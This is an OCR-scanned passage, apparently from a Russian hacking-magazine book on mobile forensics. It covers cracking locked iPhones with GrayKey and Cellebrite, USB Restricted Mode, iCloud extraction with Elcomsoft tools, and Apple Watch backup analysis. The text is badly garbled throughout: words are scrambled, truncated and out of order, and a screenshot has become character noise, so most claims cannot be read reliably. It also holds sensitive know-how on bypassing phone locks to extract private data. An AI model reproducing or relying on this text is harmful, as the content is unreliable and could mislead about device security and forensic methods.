
представляшь

за
я

телфон
разу

с

взломать

заблокирвн

четырхзнай

чем
дл

ни

вода

компьютеру.

можн

устройва

версия
раз

высокй:

телфон)

котрый

л и

телфон

старя

(если

мен

На

2.

Если
их

ты

будет

-

к

до

даных
об

,

сотяни

условиях

зится

устройв

информацю

Можн

принце

хотя
приятных

высокй

под

, что

взломать

от зависеь

пользватем

рать

пом­

блокирв?

интерсог.

з апущен

бора

не

работе

пердач

получить

д

можн

будет

Ce llebrite

ть

телфон

располжив

На

ничем

запущен.

ко

самог

обстяельва,

1.

о

экран

, многе
н ые

эт

iPlюne

вероятнсь

, но

кированый

а ях

дошли

известн

м

взломать

киров

мы

не

забло

с луч

код

на

теб

подключи

д аже

блокирв.

если

высока

сможешь

апртног

к ода

тог:

очень

оснве

самог

Боле

же

его

получится

Попрбуем

В

да

iOS

на

компьютеру.

нет.
, то

ты

-

тог

-

памяти,

ним

новй

подключить

заблокирвн

Итак

к

боле
не

на

,
микросхеу

ступа

ил

ты

физческ
узнать,

л ьзовател

и з телфона

, до

правильног

будет

по

зашифровны

iOS 11 .4.1

Точне,

динамческ

водит

извлечшь

н ые

□

вычисляет

котрые

если

жет:

ключ

даных,

-

эта

Запустиь

опция

и

включена

обйти

активролся

можн

уничтоже

в

Touch ID

таком

ил

USB

случае

,

Face 1D

автомизрный

либо

.

пос ле

д есяти

это

ве­

пербо
даных

пользватем)

режим

сделать

датчиком

блокирв.

удастя

новая;

не
неврых

160
□-

Как

работе

Для

взлом

совремных

кода

устройв

котрые

по

с

зволяют

компания

код

и

Cel lebrite

пре

правохнительым

бы

в зломать

код

ни;

ач

тобы

понять

охраняет

Д

р утое
ни

могут

ется

,

разботл

, доступнг

исключтеьно

отправиь

пербо

в

в
принце

его

GrayKey тельным

Что­

сервиный

центр

, теб
и з вестно

компа­

предложат

запуст

мало;

компания

разботл

ить

тщаельно

компания

органм

самотяельн

и

занимться

другим

пербом

Реш­

Grayshift.

некотрым

организцям,

паролей.

Про

GrayKey

нам

больше.

Решни

не

Grays/1ift
мать

старые

тиь

на

ил

При
для

длиться

ственог

лишь

устройв

перхо
Звучит

дит

неплох

пер

бо

хот

я

(ил

р
бы

раз

,

н евозмжн.

ил

паролем

цифр

в

овым

длагют

кодм

боле

Это

(а
по

точки

»

ия

д

каче­

(устрой

­

шести

з начыми
резко

. Увы

па

года

, то

скорть

дает

и

на

уст

уст

будет
и

GrayKey
GrayKey огра
­
тво

с

шестизнач­

имено

такой

iOS

будет

»

ройстве
помщ

ройс

верси

ыстрй

пользвате

пербоа
что

«б

и

при

означет,

взломать

, но

Есл

пербо

совремны

умолчанию)

лет
с

зрения)

версий

минут.

ко

без

яти

,

этог

четырхзнай

пербоа

«быстрй

новых

я т ь

я

.
от

блокирв

установиь

Режим

и

дес

ки

дл но

Правд,

11 .3.1 включитеьно.
29 мая
2018

Там

д ки.
загру

минут,

дес

минут).

зависмот

после

что

поря

паролей

займет

пербоа

новая.

iOS 11.4
Для

на

скорть

до

на

-

30

, атк

поытк

включе­
тольк

после
за

десять
тысяч

iPhoпe

разы

цифровых

iOS

боле

после

з блокирван

пербо

версий

свой

одним

в

для

обнвля

iOS 11.4

пре

медлног

лишь

работь

ным

в режим
плох

возмжен

ничеа

300

ра

включено

каждые

после

з

в

возмжен

полный

поытка

тонксь:

ра

з апус­

были

не

шестизначых

забыть:

одна

есть

бы
цифр

взлом

раз

котрые
даже

что

про

бы

устройвах,

хотя

взло­
можн

хотя

четырх
тольк

а

можн

дается
кодами

было

дней,

70

словаря
вом

было

удалось

Пербо

разблокивны
»

из

него

ситемы.

отличаеся

котре
он

до

черз

режим

«холдны

паролей

если

ет

на
пербоа

,
всех

устройва,

бу д

и

скорть

устройва

в

были

так

этом

пербо

же

агент
котрые

узки,

(имено

DFU

загружет

устройвах,

включены.
полный

режимо
и

перзаг

Так,

пользуется

айфоны)

ка
ния

практичес

код

невозмж

н о.

USB Restricted Mode

Об

этом

уже режим

« Хакер

».

мен

да

нео

Начиня

ными

протклу
ил

це

лью

против

днократ

писал

iOS 11.4.1 уст
USB
с

по

р азблокирвн

с

решния

них

постанвлеия.

Cellebrite

правохни

известно

сервиа

нужо

решни

назыв

поставляе

котрые

виде

два
из

секрты.

решни

е

ровн
Одно

сотвеующг

ли
Про

свои

в

налич

, возмжен

сущетв

экран.

телфон

утил.

11
и

его
при

блокирв,

с п ециальную

версий

блокирв

доставляе

органм

□

блокирв

iOS I О

подбрать

-

отключен

действия

от

комплеса

, в

ройства
спутя

числе

iPhone
один

аксеур

том

час

на

журнал

блокируют

тог,

ка

всего,

и

страницх

полнстью

iPad
после

. Скоре

GrayKey

и

и

Cellebrite,

это

котрые

об

устрой
режим

ство
был

позвляют

­

б ы ло
ведн

по

-

161
□-

добрать

код
Режим

блокирв

устройва

оказлся

при

достачн

эфект

невозмж подключить

к

-

□

помщи

неизвстог

ивным:

Ар

устройва

с

сотвеующй

\е

эксплоита.

заблокирвным

ситем,

портм

и

пербо

не

за

пускаетя

14.4).
(рис.

(D USB ACC€$$0RY
Unlock fPhone to use accessories
Рис.

14.4. Так

выглядит

экран

спутя

Можн

час

ли

iPhone , если

после

блокирв

обйти

режим

достачн
в

очердь

USB?

после

дней

к
сотяни

Иными

словами

,

при

конфисац

всего

,
час

Безопаснть

USB
ства

даже

в

забло

­

ржкой

к

Ар\е

зарядки).

с

Если

режим

и

не

пустиь

на

Lightning

этог

за

не

совметиу
сделать

, то

пербо

кодв

Apple

з нают

о

обйти
будет

(а

это не

, то

аксеурм

пер

эта

пердач

возмжнсть
по

блокирв

протклу

экран

компьютеру

дачу
войдет

даных

после

ил

защит­

блокирвать

Если
факт)

сразу

к

возмжнсти

у строй­

придется

в

разблоки­

.

пользвате
зарядки

моента

придется
его

котрая

деактиврон

его
для

все!)

подключить

устройва.

iOS
телфон

удобства
и

не

с

полиц
и

з ащитный

блокирв

автомическ

(впрочем,

де

технолгию,

после

сотяни

Ради

час

перходник
по

. В

атывю

подключать

рованм

огра­

истечня

сотрудник
, но

гонка
разб
сборки

будет

ных

срабтывние
до

ройств

в

нескочамя
и

очерднй

-

да

(ко­

Во-втрых,

офицальный
с

перйдт

мгнове
сотав

пердачи

удастя.

USB
режим

аксеур

пальц отечк

(годятс

Фардея

примеу,

телфон

не

даных

клету

портм

черз

в

к

доплнитеьым

блокирв
ный

уст
в

(сгодитя
с

выше).

аксеур

телфон

аксеур

активц
помщи

телфон

совметиу

ил
аксеур

.

полжить

USB 3

см.

-

ьютеру
ил

для
при

вечн

к комп

компьютера

Во-первых,

, подключив

блокирв

тольк

не

предотваиь

кированм

от

наприме

, тоже

можн

его

отключения

телфон,

свою

ничея

подключить
ил

защиты

разблокивть
торый,

порбвать
экран

ля

от

подключени

сделаны
ника

обычнх

за

исключеня
не

рядных

влияет
устройв

для
на

перходника

на

срабтывние

-

аудиорзъем

USB Restricted Mode)
но

не

от

компьютернг

порта.

□-

Что

делать,
ил

если
его

Как

извлечь

даные

ка

при

из

уст

учет

запис

досту

черз

пен

почту.

можн,

,

споб:
и

пароль

?

на

пароль

от

может

на

Ш

то

□

синхрозваые

следующи
(до

да

,

потреб

все
я

ка

пароль

,

лы

, синхрозваые

с

шифровк
□

раздел

если

если

включен

и
по

ри

, и

учае,

да

и

удалос

SIМ-карт

ь

обйти

эти

(наприме,

Elcomsoft
в учетной

спиок
и

блокирв

и

(для

Мае

даже

даже

из

, то

Safari
жур­

iMessage,

однг
есть

, и

в

контаы,

iMessage

код

запис);

открых

заметки,

л ьзователя

компьютера

iCloud Keychain,
Для

устройв

сл

и

да

то

iCloud Photo Library -

ресуов.

и

прав­

д оверных

могут

найтись

и

депонирваый

ключ

для

фай­
рас­

FileVault 2;

включена

□

пароля
так

теб

раз;~.олье:

кален

так
у

логина,
аутенифкц,

если

, включая

Если

марке

без

устройва

-

собщения

пользватея).

,

назывемй

каждом

каждог

Здесь
, и

тексовы

уетс

устройв

для

.

активрон

вещи:

двух

посещний

и

так

софта

скачть

исторей

в

но

­
она

марке

специалзровнг

копи

с

не

дом,

там

iPhone.

л я

найтись

ли

сбро порбвать

iCloud

ка

РIN-ко

сможешь

звонк

же
в

пользватея.

найдется

. Или

тог

з оваться

может

даные
нал

же)

пользвате

автори

помщи

резвны

страниц

тем

все

Для

Elcomsoft Internet
не

, если

компьютер

iCloud

при

Phone Breaker) ты
облачные

и

из

собтвеным

,

□

ил

л я

,

Разумется,

защиен

паро

, з апустиь

, извлечную
позвлит

Apple

и

При­

копи.

посмтреь

одним

аутенифкц.

быть
преятсви

будет

SIМ-карту

поискать

фактор

примеу
и

?

iCloud. Поли­
у Apple

резвны

аутенифкцю

, котрый
и

, к

ройства

лако

запросить

Apple fD

двухфакторню

можн

вторичнг

помщи

Можн

(он

об

может

пользватея

iCloud

уст

черз
облачные

при

компьютер

SMS

аутенифкц

сломанг

совем:

, включая

другой

Обойти

получив

Наконец

нет

пользватея

Откуда
взять
App le Ш
Password Breaker на
паро
ль
от
Apple ID ил
сить

ил

, котрг
постанвлеия

ной

прочих

, сломан

заблокирвнг

ройства

сотвеующг

из
всех

заблокирвн

из

и

налич

даные

□

нет

же, так
ция

телфон

восе

можн

мерно

162 -

этог

потреб

уетс

пользватея

то

и
я

и

фотграи;

пароли

пользватея

вести

от

код

блокирв

разных

онлайвых

однг

из

д оверных

.

Заключени
Если

ты

iPhone

прочитал

это

за

девять

раз

минут

безымяног

комплеса
фон

работе
ваемы

iOS 11.2,
, не

вышед

д

защиен

я

ко

,

ты

уже

догался,

« магическо
вз

управленим

2

вероятн

помщи
дл

по

дел,

при

лома

мобильных

дом

блокирв

»

ил
Да

(т.

ил

код

блокирв

любезно

е .

не

ли

в злом

ать

специалзровнг

устройв.

iOS 10-11 .2.1
2017 года)
и был
декабря

можн

куба

, можн

-

получи

если

тел­

обнвлеи

до

разблокивн
извес

подзре­
те н

.

□Если

пользвате
не

хоть

сработе.

тае

Если
,

код
же

телфон

час

А

что

и

ожидается

в

перйдут
старше
уже

что

не

высокую.

iOS 13

ближайшем

стане

iOS
к

Уже

ил

даные).

11.4. 1,
от

аксеур

а

прошл

но

с

мо­

больше

частнои,

вероятнсь,

что
эта

на

котрую,

скоре

масовый

перход

режима
джейлбрка

когда

.

В

распотнеи

возмжнсть
моент,

iOS 13,
вышла

iOS.

масове

, на

все

управленим

пользватеи

означет и

обнаруже,

возмжны

под

будщем?

сущетв

Возмжн

GrayKey
извлечт

подключения

срабо­

сервиы.

все

12

iOS 12
пока

эти

практичес

на
iOS
Mode.
Для

ил

магия

не

решним

самотяельн

работе

помгут

всего,

успеха

года

2017
- магия

отдельным

случае

разблокив

, не то

2 декабря
паролем

взламыть
в

и заблокрвн

последнй

после
неизвстым

придется
, кстаи,

□

устройв
заблокирвн

блокирв

мента

обнвил

телфон

(котре

Cellebrite
Если

раз

-

163

книга

их

. Для

USB Restricted

найдут

iOS 13

, эксперты
постуи

уязвимостей

оценивают,
в

про

д аж

ка
у,

джейлбрк

......
-п;:.НЕР

-□

15.
Извлекам

и

даные

анлизруем

Apple Watch
ОлегАфони

Ар\е

одна

Watch их

версия

превос

самых

помщи

(и

App le

час

ов

, где

они

лет
В

превыш

ает

выделятс
л ишь

ог

з амен

у

у
о

вертая

(по

с

факту

пята)
м

, в свою

с пеци

очердь

Эта

версия

стаья

на
в

в

пок

ситем
с

безопаснти

,

инстру

ко

году.

В

Мати

следующм

е

году

от часов

котре

вышло

-

Ар

\е

чет­

работю

WatchOS,

Эпифан
в

ку

р\

ко

д

кот­

iOS.

нсульта

к тор

А

модель

ситемы

мобильнй

сотавил
.

актульня

верси

поч­

моделй

Series 1,
де нь

Все

году

рынке

олени

часов
, что
моде­

всех

глобаьнм

2015

им

умных

часов

2018

доля

в

эт

разнобия

котрых

пришло

NET,

и
ы х

всего

сумарня

выпущена

соавтре

REALIТY

бильной

дажи

д и

операцинй

напис
компани

про

на

ализровнй

с

.

умн

С ре

Series 2. На
сегодняший
App le Watch 4.

, оснва

янской

года.

полвины

часов

оисхдт

треков

го

была

Watch

пр

При

раться

милон

141

лет

поклению

версий

у правлени

рой

\е

Что

р азоб

дан

Watch,
до

Ар

первом

о д новрем

про

несколь

н е дотягивае

часов

даных.

д ы дуще

Ар\е
Уже

нем
версия

пре

смартфонв.

разнобых
был

Последня
котрг

модели
Попрбуем

ярность

году

ат

единц.

Первая

под

ульт

часов.
, мощнсть

бюджетны)

и звлечь?

ул

умных

процесм

масивы

по

линейка

22,5 милона
Watch
на

рез

марок
и

очень

их

2018

мире

чиков

огрмные

ка

несколь

лей

не

собирает

возрсла.
в д в ое

дат

даже

и хранятс

последни
значительо

в

наборм

бюджетны

д аными

ти

поулярных

полным

ходит

За

из

оснаще

цифровй

SANS
рсов

-

. Мати
сфер

оснватель

италь­

и

кримналст

соавтр

и

мо

­

Learning iOS
книг

Forensics.

Почему
В

Apple Watch?
от

л иче

от

ботающих

подрбн

по
ресовали

ли

тур

д аны
и

Сары

иследованых

д
шь
х

смартфонв

управленим

операцинй
небольш

Ар\е

Эдваре

mac4 n6/Presenta tions/ЫЬmaer

число

Watch, стал
(Sarah Edwards),

iPhone
iOS, часы
ситемы

экс

пертов.
публикаця

Первой

работй
Хизер

и

д ругих
, описывающей

Махлик

уст

Ар\е

р ойств,

Watch

ра­

заинте
струк

­
­

(Heather Mahalik)
опубликваня
в 2015 году
(https://github.com/
/ Apple%20W atch %20-%20Times % 20а'
%20

165
□-

-

Tickin'/Apple_Watch_Times_a_Tickin.pdf).
следований

часов

Пос

ледни

от

верси

д атчиков.

не

часов

Здесь

и

Ар\е

и

чик

чипсе

д аже

т
дат

для

датчик

опредлния

у че

том

тог

ожидать

что

, что
ведут

по

мер

Кроме

iPhone.

можн

устанвлиь

фотграи
содержатья

час

ваться

на

в

виде

рейс и

помщни

к
нить

делат

ь и

обычнй

Информацию

и з
влечь

р езрвную

по

к

компьютеру

,

ског
(в

ли

,

очердь

речь

о

даных

с

ил

обла

всех

позв­

что

эт

чной

ре

может

их

даных?
, из­

з ервной

копи
напрямую

дан

ные

метод

достаь
»

и

тог,

подключить

извлечь

орвья

талон

и . Во-первых

возмжн

«Зд

до

можн

чего

ные

­

можн
и з

спобам

часы

мо­

голсвй

часов

ься

них

д очнг

многе

локаьнй

в
зарегисто

работе

LTE, то

них

синхро­

поса

разными

после

Часы

, причем

часх

делать

торых,

дан

часх.

ло­

музык,

добрат

,

идет

с

умеют

тремя

некотры

бы

, на

на

На

возмжнсть
из

было

магзин),

телфо

слушать

часов

перходник

Наконец

первую

верси

ично
в

помщи

Watch

Apple Watch
iPhone. Во-в
часм

с

можн

извлечь

используя

анлиз.

часов

о

можн
копию

дключеног

к

идет

Есть

часов

когда

анлогичых

из

ия

покуи.

Ар\е

смартфон.

логиче­

и з

пользвате

облак

iCloud

я , котрые

собирают

часы).

Каждый

этиз
от

тог,

их

спобв

ются,

котрый

но

возращет
можн

мы

симально

рек

свой

получить

по

полнг

тольк

от

Согласн

испо

сопряжен

серви

даже

ных

,отличный
перска­

три

споба

мак­для

рвную

копию
я

в подключенм

к

, чтобы

со

iTunes.

, содержим

iPlюne

п л атформы

зе
дл

прогаме
о

Ар\е

устройв

апртной
ре

льзоват

исключтеьн

документаци

на

да
частино

все

покления
создавть

, ни
и

р

iPhone

независмо

приложеням

даются

бо

Даные

.

копи

Часы
Apple Watch
WatchOS обладют
возмжнстью
не е,
WatchOS не по зволяет

на

спобами.

использват

резвной

сторним

и

возмжнсти

извлечня

Анализ

собтвеный

другим

оменду

и

для

моенты,

формат

контрль при

речь

Galileo,
работю

лог

сторние,

оплачивть

часы

и

циферблаты

числе

. С

же

словами,

те

многчислеы

том

посадчный

Siri. Если

. Иными

полнце­

датчик

сохраняет
с

уведомлн

можн

и

чиков

памяти,
даных

быть

собщения

Часми

дат
в

встроенй

могут
(в

пройти

QR-кода.

этих

лишь

совпадет

получают

ть

пульса,
,

Приме-

собраных

часх

. Часы

и з

периодчск.

котрых

приложеня

з ировать
жет

часть

, на

датчик

пробежку.

, формат

тог

ис­

GPS, GLONASS

8 Гбайт

логи

и
поля

активруеся

на

,

Многие

обрудваны

крайне

масштбу

разнобых

шагомер

магнито

л ишь

вышел

часы

полнцеы

гов

ты

и

спутникам

котрый

, ч то

,

датчик

р диограм.

местоплжния,

С

и

по

включатся

WatchOS считае

по

числом

ния

,

снятиэлекроа
некотры

сравнимых

большим

кординат

для
, но

пор

давле

опредлния

чик

постян

тех

оснащеы

атмосфернг

инерцоы

ный

С

.

Apple Watch
дат

чувстиельны

провдилсь

□

дан

часм

и

зд

д аных.

Резрв

ания

не

резвных

ме­

копий

ны

е

смартфоне

Apple Watch автомическ
ные
App le Watch

верси

Тем
копи

ни

часов

iPhone.

соз­

копируется

можн

было

воста-

166
□-

навить

из

можн

этой

резвной

было

копи.

бы

исключенм

часы

копирване

даных
подрбн

копий

нам

свежй

отсединь

ru/НT204518)

□

сожалению,

создание

однг:
«Резрвно

К

форсивать

-

ре

неизвст

зерв

споб

ной

копи

, котрым

часов

в

iPhone, за
iPhone, разов
пар
у.
В стаье
Apple
Apple Watch» (https://support.apple.com/ruот

описан, чт

входит

, а

ч то

не

входит

в

сотав

ре

зервных

часов.

Вот

что
□

включает

резвная

даные

(для
располжени

□

настройки

даных

встроеных

прогам)

□

копия

Apple Watc\1:

прогам)

и

настройки

(для

встроеных

и

сторних

;

прогам

на

Dock
панели

□

медицнск
□

настройки

□

плей-исты

даные

и

и

экране

«Домй»

и

оснвые

настройки

ситемны

циферблат;

даные

о

настройки

физческой

;

активнос

;

уведомлний;

, альбомы

и

миксы

, синхрозуемы

на

и

Apple Watch,

настройки

музыки;

□

настройки

пармет
поздних

□

синхрозваый
часовй

з ыв

»

для

ил

Apple Watch Series 3

боле

пояс.

Вот

что

не

входит

запис
□

д иот

фотальбм;

□

□

« Ау

Siri

моделй;

в

резвную

копию

сопряжени

даных

Apple Watch:

даные

Bluetooth;
кредитных

ил

дебтовых

карт

для

платежй

Рау

Apple

, сохранеы

на

Apple Watch;
□

код-парль

к

Таким

образм

часм

мый

Apple Watch.

, резвную

простй

копию

споб

копию

iPhone,

это
после

чего

останвлиья

на

вались

в

можн
утилой
и

по
для

адресу

д ания

, что

соде

ржимое
х

для

даных

из

часов

,

ре

. Мы

не

( они
копий

создания

будем

к

зервную
по д

робн

многкрат

описы­

свежй

подключеных

iPhone. Са­

облачную

ре

iTunes ил
одну
и з сторних
прогам
Elcomsoft iOS Foreпsic
Toolkit, с т раниц
ра
азрб
https://www.elcomsoft.com/eift.html (она

извлечня

из

ил

резвны

тольк

извлечь

локаьную
е

отмеи

полжена

д ать

проанлизвть
соз

можн

Apple Watch
соз

-

процеду

Интер);

использват

лись

часов

сделать

, но

зе

рвной

мы

копи

воспльза­

отчикв

котрй

же

рас­

пригодтся

по

компьютеру

черз

зже

перхо

д

­

ник).

Итак,

резвная

копия

iPhone

создан,

осталь

найти

в

ней

р ез

рвн

ую

Apple Watch. Для
этог
мы
воспльзуемя
д в ум
я
ут илтам
(https://www.icopybot.com/itunes-backup-manager.htm, доступна
дл
MacOS) и SQLite Expert для
Windows (http://www.sqliteexpert.com/).
Начнем

iPhone

с
в приложен

анлиз

специфкай

устройва.

iBackupBot.

Для

этог

открем

резвную

я

:

копию

часов

iBackupBot
Windows и
копию

□-

В

паке

-

167

□

\НomeDainLbryvcRgst.

(рис.

нахо

д ятс

следующи

файлы

В

15.1):
□

historySecureProperties.plist;
□

stateMachine-.PLIST;
□

activestatemachine.plist;
□

history.plist.
файле

historySecureProperties.plist хранится
серийны
UDID (UniqueDeviceidentifier), МАС-адрес
Bluetooth подключеных
к телфону
часов
Apple Watch

номер

часов

идентфкаор

\ iВ.:lr

u pSo(

~ ~е.

.

$

(1

f oti
; e)

s

ertlf

~co-.aplr;№"°'1Uw\d~C

o:

-0), .:о~НrР'

Cf-.sundk'l'!NC: ¼ ~9,~iy
: ;г:.,~

Ct

;,i

d;~

i
е'/

.Щt,J

~ld ,_,-/'· ',-. -... -.. ,.[.,._,.•.. : ... ·,-v·'•>l~
C!,ci;№~tr ....

- 610f",9(;SDZВ:

• 4EбZ·A18
78Н20С"4

i

P tyrт.nCdi

V

- n aЛRA1!

- 7M5-tnng

Typl'
Dтsot:Вuld

WКComp,;nIOt.Bu

nd

ldб!

SequtncENmlнr

CFBundlrOis-pi.yNamr
·Containff
CFBundltO~opm~tR.tgion
l1Up9rde:Ы

Par11lle!Place:holdffP1th
OT

Pl1tform№e

Ар

iPhonl' OS ApЬc1tion
Sщn1g

APPl
16RS91

t ife,

rtJ1n9

10061

"''"•
1ntege:r

1!32

com.uЬrf1b

. UЬerCl

/ pri\'atf/v1mobeCnsD,JдlkП~8

rtrin9
boole:an
boole:1n

CfВundl6porteP4m

- 4&8-90CA721

"""
tru,
w1tcho~

str1n9

u,..

""'9
uь"

З.35610

\ ,1

ctr1n9
arr1y

• DTXc:ode:
MintmumOSYtrSIOl'I
, • · UISuporte:d/n,fкl'Omis
: · • CFBun~eldmtifier

- C2:50

""

Яring

DTPl1tformVrrsion

i ent

UЬ«

~tring
stt1n9

"""9

A.pplic1tionTy~
CFBundleNo1me:
CFBundlrVerblOn

~

WмchКit:

3.356.10001

stлng

·D11kode:8uild

1

UЬв

dict

, • CFBundleShortVm:ionString

i
!

1бR59

1327Ыб0

rnt~e:r
ttring
rtring

Signe:rtde:ntlty

'

w~chosS.1

dkt

P,th

~

1п

"'"'9

· DTSOK№rм

ялng

1010

stnng

, ,о

'""

com

rtring

-·

, UbfCl

. UЬtrCl

i e:nt.w,chkгp

.1rr1y

[
UIAppfonts
•